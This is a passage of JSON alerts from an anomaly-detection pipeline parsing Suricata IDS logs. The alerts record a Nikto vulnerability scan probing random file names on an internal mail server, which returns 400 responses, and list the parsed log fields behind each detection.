[ "03/04/2020-19:18:34.341111 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46936 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.34 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", 
"/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.sqlite", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.342355+0000\",\"flow_id\":630883435031917,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46936,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.sqlite\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.sqlite\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.342355, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":630883435031917,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46936,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.sqlite\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.sqlite\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": 
"\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46936,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.sqlite\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.sqlite\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.sqlite\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.sqlite\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.sqlite", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": 
"mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.sqlite", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46936,\"proto\":\"TCP\"", 
"/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46936, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":630883435031917,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 630883435031917, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.342355+0000\",\"flow_id\":630883435031917,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46936,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.sqlite\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.sqlite\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.34 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, 
"AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.343787 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46938 -> 192.168.10.154:80", "/parser/model/time": 1583349514.343787, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46938, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.343787 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46938 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.34 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value 
combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.ncf", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.343942+0000\",\"flow_id\":2066313044966357,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46938,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.ncf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.ncf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.343942, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":2066313044966357,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46938,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.ncf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.ncf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": 
"fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46938,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.ncf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.ncf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.ncf\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.ncf\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.ncf", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", 
"/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.ncf", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46938,\"proto\":\"TCP\"", 
"/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46938, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":2066313044966357,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 2066313044966357, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.343942+0000\",\"flow_id\":2066313044966357,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46938,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.ncf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.ncf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.34 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, 
"AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.345338 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46940 -> 192.168.10.154:80", "/parser/model/time": 1583349514.345338, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46940, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.345338 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46940 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.35 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value 
combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.Htm", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.345637+0000\",\"flow_id\":1697602987508313,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46940,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.Htm\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.Htm\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.345637, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1697602987508313,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46940,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.Htm\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.Htm\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": 
"fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46940,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.Htm\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.Htm\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.Htm\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.Htm\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.Htm", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", 
"/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.Htm", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46940,\"proto\":\"TCP\"", 
"/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46940, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1697602987508313,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1697602987508313, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.345637+0000\",\"flow_id\":1697602987508313,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46940,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.Htm\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) 